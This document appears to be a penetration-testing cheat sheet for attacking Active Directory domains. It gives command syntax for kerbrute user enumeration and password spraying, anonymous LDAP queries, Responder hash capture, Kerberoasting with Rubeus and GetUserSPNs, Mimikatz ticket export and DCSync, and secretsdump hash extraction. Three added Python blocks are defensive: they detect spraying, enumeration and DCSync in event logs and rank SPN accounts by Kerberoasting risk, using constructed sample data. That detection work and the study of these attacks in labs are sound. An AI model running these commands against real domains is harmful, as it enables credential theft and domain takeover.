Interesting Tools
Internal AD Username Enumeration
Kerbrute
Installation:
sudo git clone https://github.com/ropnop/kerbrute.git
cd kerbrute
sudo make all
Putting the binary on the PATH (make all writes the builds to dist/):
sudo mv dist/kerbrute_linux_amd64 /usr/local/bin/kerbrute
Syntax:
kerbrute userenum -d <domain> --dc <IP> <listUsernames> -o <File-valid_AD_users>
This command enumerates users in an Active Directory (AD) domain with kerbrute, a widely used tool for Kerberos-based user enumeration and password brute forcing. The usernames confirmed as valid are written to the output file.
ldapsearch
Gathering Users with LDAP Anonymous.
Syntax:
ldapsearch -h <IP> -x -b "DC=<domain>" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "
Example command:
ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "
Here -x selects a simple bind with no credentials, i.e. an anonymous bind. Newer OpenLDAP clients deprecate -h/-p in favour of -H ldap://<IP>.
windapsearch
./windapsearch.py --dc-ip <IP> -u "" -U
Here we can specify anonymous access by providing a blank username with the -u flag and the -U flag to tell the tool to retrieve just users.
Crackmapexec
Syntax:
crackmapexec <protocol> <IP> -u <username> -p <password> --users
PowerView
This command, from the ActiveDirectory PowerShell module, creates a list of domain users:
PS C:\> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > <ad_users.txt>
Gathering Information
PowerView
PowerView is a versatile PowerShell script for Active Directory reconnaissance and enumeration in Windows environments.
It is a valuable tool for gathering information about domains, users, groups, and permissions. It facilitates the identification of vulnerable user accounts, high-privileged groups, and other key aspects of Active Directory’s structure and configuration.
Download: https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
Password Spraying
kerbrute
Syntax:
kerbrute passwordspray -d <domain> --dc <IP> <list_users.txt> <password>
Crackmapexec
Syntax:
crackmapexec <protocol> <IP> -u <list_users.txt> -p <password> | grep +
Validating the credentials:
crackmapexec <protocol> <IP> -u <username> -p <password>
DomainPasswordSpray.ps1
It is a PowerShell tool run from a Windows host.
Syntax:
PS C:\> Import-Module .\DomainPasswordSpray.ps1
PS C:\> Invoke-DomainPasswordSpray -Password <password> -OutFile <outputFile> -ErrorAction SilentlyContinue
Download: https://github.com/dafthack/DomainPasswordSpray
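Both the kerbrute user enumeration above and the password sprays in this section leave a distinctive trace in the domain controller's Security log: enumeration produces Kerberos TGT requests (event 4768) with result code 0x6 for names that do not exist, while spraying produces pre-authentication failures (event 4771) with failure code 0x18 across many different accounts from one host. The detection below is an added example and not part of the original page; it applies a sliding window to such records, and the event tuples, the 5-minute window and the 10-account threshold are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# (event id, result code) pairs that identify each pattern in a DC Security log:
#   4768 / 0x6  = KDC_ERR_C_PRINCIPAL_UNKNOWN: the requested username does not exist
#   4771 / 0x18 = KDC_ERR_PREAUTH_FAILED: the user exists but the password was wrong
PATTERNS = {(4768, "0x6"): "username enumeration", (4771, "0x18"): "password spraying"}

def detect_kerberos_abuse(events, window=timedelta(minutes=5), min_accounts=10):
    """events: iterable of (timestamp, event_id, account, client_ip, result_code).
    Returns one alert per (client_ip, pattern) whose distinct target accounts inside
    some window-long span reach min_accounts."""
    buckets = defaultdict(list)
    for ts, eid, account, ip, code in events:
        kind = PATTERNS.get((eid, code))
        if kind:
            buckets[(ip, kind)].append((ts, account))
    alerts = []
    for (ip, kind), hits in buckets.items():
        hits.sort()
        best, start = 0, 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:  # drop events that fell out of the window
                start += 1
            best = max(best, len({acct for _, acct in hits[start:end + 1]}))
        if best >= min_accounts:
            alerts.append({"source_ip": ip, "pattern": kind, "distinct_accounts": best})
    return alerts

# Constructed sample telemetry (not from a real domain): a userenum run from 10.0.0.5,
# a spray across 11 accounts from 10.0.0.9, and one user mistyping a password three times.
T0 = datetime(2024, 1, 1, 9, 0, 0)
SAMPLE_EVENTS = (
    [(T0 + timedelta(seconds=i), 4768, f"guess{i}", "10.0.0.5", "0x6") for i in range(12)]
    + [(T0 + timedelta(seconds=i), 4771, f"user{i}", "10.0.0.9", "0x18") for i in range(11)]
    + [(T0 + timedelta(seconds=i), 4771, "jdoe", "10.0.0.20", "0x18") for i in range(3)]
)

if __name__ == "__main__":
    for alert in detect_kerberos_abuse(SAMPLE_EVENTS):
        print(alert)
```

A spray with crackmapexec over SMB authenticates with NTLM instead, so it surfaces as 4776/4625 failures rather than 4771; the same windowed distinct-account count applies to those records.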
Acquire Credentials or other Sensitive Data
Snaffler obtains a list of hosts within the domain and then enumerates those hosts for shares and readable directories, looking for files that may hold credentials (-s prints results to stdout, -o writes the log file, -v data sets the verbosity):
Snaffler.exe -s -d <domain> -o <output.log> -v data
Graphical Interface for Analyzing Active Directory (AD)
BloodHound
BloodHound leverages data from AD, including user accounts, group memberships, permissions, and trust relationships, to map attack paths and permissions across the network.
SharpHound is a component of the BloodHound project. It is a collection of C# tools designed to gather data from an Active Directory (AD) environment quickly and efficiently. SharpHound leverages various AD enumeration techniques to retrieve information about users, groups, permissions, and other AD objects. The data collected by SharpHound is used by BloodHound to analyze and visualize the AD environment, identifying attack paths and potential security risks.
Download: https://github.com/BloodHoundAD/BloodHound
Running the SharpHound.exe collector:
.\SharpHound.exe -c All --zipfilename <output>
Intercepting Hashes
Responder
In this process, a malicious file is used to trigger the victim host into authenticating to the attacker's server. Responder is employed as the LLMNR/NBT-NS poisoner that answers the name lookups and captures the NTLMv2 hashes for relaying or offline cracking.
Download: https://github.com/lgandx/Responder
Syntax:
./Responder.py -I <WiFi-interface> [options]
Inveigh
Download: https://github.com/Kevin-Robertson/Inveigh
Windows Kerberos Ticket
Rubeus
Rubeus is a powerful open-source tool used for Windows Kerberos ticket manipulation. It is primarily designed for offensive security purposes and is widely utilized by security professionals, penetration testers, and red teamers.
Some key functionalities of Rubeus include: Ticket Extraction, Pass-the-Ticket (PTT), Kerberoasting, Overpass-the-Hash and more.
- Kerberoasting: Rubeus can request and crack Kerberos Ticket Granting Service (TGS) tickets for service accounts to obtain plaintext passwords.
Download: https://github.com/GhostPack/Rubeus
Mimikatz
Performs many functions. Notably, pass-the-hash attacks, extracting plaintext passwords, and Kerberos ticket extraction from memory on a host.
Download: https://github.com/ParrotSec/mimikatz
Command:
mimikatz # sekurlsa::tickets /export
Credentialed Enumeration - from Windows
ActiveDirectory Module
Load ActiveDirectory Module
PS C:\> Import-Module ActiveDirectory
PS C:\> Get-Module
Get Domain Info
PS C:\> Get-ADDomain
Checking For Trust Relationships
PS C:\> Get-ADTrust -Filter *
Group Enumeration
PS C:\> Get-ADGroup -Filter * | select name
Detailed Group Info
PS C:\> Get-ADGroup -Identity "<nameGroup>"
PowerView Module
Domain User Information
PS C:\> Get-DomainUser -Identity mmorgan -Domain inlanefreight.local | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrol
Recursive Group Membership
PS C:\> Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Trust Enumeration
PS C:\> Get-DomainTrustMapping
Testing for Local Admin Access
PS C:\> Test-AdminAccess -ComputerName <computerName>
Finding Users With SPN Set
We can check for users with the SPN attribute set, which indicates that the account may be subject to a Kerberoasting attack.
PS C:\> Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName
Net Commands
Listing Domain Groups
PS C:\> net group /domain
Information about a Domain User
PS C:\> net user /domain <username>
Kerberoasting
Kerberoasting is a lateral movement/privilege escalation technique in Active Directory environments. This attack targets Service Principal Names (SPN) accounts. SPNs are unique identifiers that Kerberos uses to map a service instance to a service account in whose context the service is running.
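Since the attack only needs a service ticket, the defender's lever is the SPN accounts themselves: whether they still allow RC4 ticket encryption, how old their passwords are, and whether they are privileged. The script below, an added example rather than code from the page, ranks SPN accounts (such as those returned by Get-DomainUser -SPN in the previous section) by those criteria; the account records, the fixed "now", and the weights are constructed assumptions, and a gMSA scores zero because its password is machine-generated and rotated automatically.

```python
from datetime import datetime, timedelta, timezone

# msDS-SupportedEncryptionTypes bit flags (documented by Microsoft)
RC4_HMAC, AES128, AES256 = 0x4, 0x8, 0x10
GMSA_CLASS = "msDS-GroupManagedServiceAccount"

def filetime_to_datetime(filetime):
    """pwdLastSet is a Windows FILETIME: 100-nanosecond ticks since 1601-01-01 UTC."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)

def assess_spn_account(acct, now):
    """acct: dict of LDAP attributes of one account with servicePrincipalName set.
    Returns (score, reasons); a higher score means remediate first."""
    if GMSA_CLASS in acct.get("objectClass", []):
        return 0, ["gMSA: long random password rotated automatically by AD, not crackable"]
    score, reasons = 0, []
    # A missing attribute is treated as RC4-only, the legacy default for user accounts.
    if not acct.get("msDS-SupportedEncryptionTypes", 0) & (AES128 | AES256):
        score, reasons = score + 2, reasons + ["no AES: tickets are issued with RC4-HMAC, the fastest to crack"]
    age_days = (now - filetime_to_datetime(acct["pwdLastSet"])).days
    if age_days > 365:
        score, reasons = score + 1, reasons + [f"password is {age_days} days old"]
    if acct.get("adminCount") == 1:
        score, reasons = score + 3, reasons + ["adminCount=1: account is (or was) in a protected, privileged group"]
    return score, reasons

def prioritize(accounts, now):
    """Return [(sAMAccountName, score, reasons)] with the riskiest account first."""
    ranked = [(a["sAMAccountName"],) + assess_spn_account(a, now) for a in accounts]
    return sorted(ranked, key=lambda r: r[1], reverse=True)

# Constructed sample directory data (not from a real domain). The FILETIME values decode
# to 2020-01-01 and 2024-06-01; NOW is fixed so the password ages are reproducible.
NOW = datetime(2024, 9, 1, tzinfo=timezone.utc)
OLD_PW, RECENT_PW = 132223104000000000, 133616736000000000
SAMPLE_SPN_ACCOUNTS = [
    {"sAMAccountName": "sqlsvc", "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"],
     "pwdLastSet": OLD_PW, "adminCount": 1, "objectClass": ["user"]},
    {"sAMAccountName": "websvc", "servicePrincipalName": ["HTTP/web01.corp.local"],
     "pwdLastSet": OLD_PW, "msDS-SupportedEncryptionTypes": RC4_HMAC | AES128 | AES256, "objectClass": ["user"]},
    {"sAMAccountName": "backupsvc", "servicePrincipalName": ["backup/bk01.corp.local"],
     "pwdLastSet": RECENT_PW, "msDS-SupportedEncryptionTypes": AES128 | AES256, "objectClass": ["user"]},
    {"sAMAccountName": "gmsa-print$", "servicePrincipalName": ["HTTP/print01.corp.local"],
     "pwdLastSet": RECENT_PW, "msDS-SupportedEncryptionTypes": AES256, "objectClass": ["user", GMSA_CLASS]},
]

if __name__ == "__main__":
    for name, score, reasons in prioritize(SAMPLE_SPN_ACCOUNTS, NOW):
        print(f"{name:12} score={score} {'; '.join(reasons)}")
```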
Interesting Tools from Linux
GetUserSPNs.py
It is a tool for listing SPN accounts. With the -request flag the TGS tickets are also output so they can be cracked later.
GetUserSPNs.py -dc-ip <IP> <domain>/<username> -request
Download: https://github.com/fortra/impacket
secretsdump
It is a tool for extracting NTLM hashes and Kerberos keys.
Syntax:
secretsdump.py -outputfile <output> -just-dc <domain>/<username>@<IP>
Interesting Tools from Windows
setspn
C:\> setspn.exe -Q */*
Mimikatz
It is very useful for extracting tickets from memory.
mimikatz # kerberos::list /export
PowerView
PS C:\> Import-Module .\PowerView.ps1
PS C:\> Get-DomainUser * -spn | select samaccountname
This lists the accounts with an SPN set, whose TGS tickets can then be requested and extracted.
Rubeus
PS C:\> .\Rubeus.exe kerberoast /user:<username> /nowrap
Download: https://github.com/GhostPack/Rubeus
ACL Enumeration
Interesting Tools
PowerView
PS C:\> Find-InterestingDomainAcl
Another way:
PS C:\> Import-Module .\PowerView.ps1
PS C:\> $sid = Convert-NameToSid <username>
PS C:\> Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
Another way:
PS C:\> $sid2 = Convert-NameToSid <username>
PS C:\> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid2} -Verbose
BloodHound
DCSync
Interesting Tools
Mimikatz
Syntax:
mimikatz # lsadump::dcsync /domain:<domain> /user:<username>
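DCSync is a replication request, so with directory service access auditing enabled the domain controller logs it as event 4662 with Access Mask 0x100 and the replication control-access-right GUIDs in the Properties field; only domain controllers (and a few sanctioned directory-sync accounts) should ever issue one. The detection below is an added example and not part of the original page: the sample 4662 records, the DC account set and the allowlist are constructed assumptions (the domain name reuses the page's example domain).

```python
import re

# Control-access-right GUIDs that a replication request carries in the 4662 Properties field
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # Access Mask value for an extended (control access) right
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)

def detect_dcsync(events, dc_accounts, allowlist=frozenset()):
    """events: 4662 records as dicts with subject, access_mask, object_name, properties.
    dc_accounts: lower-case machine account names of the domain controllers.
    allowlist: lower-case names of sanctioned sync accounts.
    Returns one alert per replication request issued by anything else."""
    alerts = []
    for ev in events:
        if ev["access_mask"] != CONTROL_ACCESS:
            continue
        rights = {REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(ev["properties"])
                  if g.lower() in REPLICATION_RIGHTS}
        if not rights:
            continue
        account = ev["subject"].split("\\")[-1].lower()  # strip the DOMAIN\ prefix
        if account in dc_accounts or account in allowlist:
            continue  # normal DC-to-DC replication or a sanctioned sync account
        alerts.append({"subject": ev["subject"], "object": ev["object_name"], "rights": sorted(rights)})
    return alerts

# Constructed sample 4662 records (not real log data); account names are invented and the
# last record uses an all-zero placeholder GUID for an unrelated property write.
REPL = "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
SAMPLE_4662 = [
    {"subject": "INLANEFREIGHT\\DC01$", "access_mask": 0x100,
     "object_name": "DC=INLANEFREIGHT,DC=LOCAL", "properties": REPL},
    {"subject": "INLANEFREIGHT\\jdoe", "access_mask": 0x100,
     "object_name": "DC=INLANEFREIGHT,DC=LOCAL", "properties": REPL},
    {"subject": "INLANEFREIGHT\\jsmith", "access_mask": 0x20,
     "object_name": "CN=jsmith,CN=Users,DC=INLANEFREIGHT,DC=LOCAL",
     "properties": "Write Property\n\t{00000000-0000-0000-0000-000000000000}"},
]
DC_ACCOUNTS = {"dc01$"}

if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_4662, DC_ACCOUNTS):
        print(alert)
```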
Enumerating GPO Names
PowerShell
PS C:\> Get-DomainGPO -All |select displayname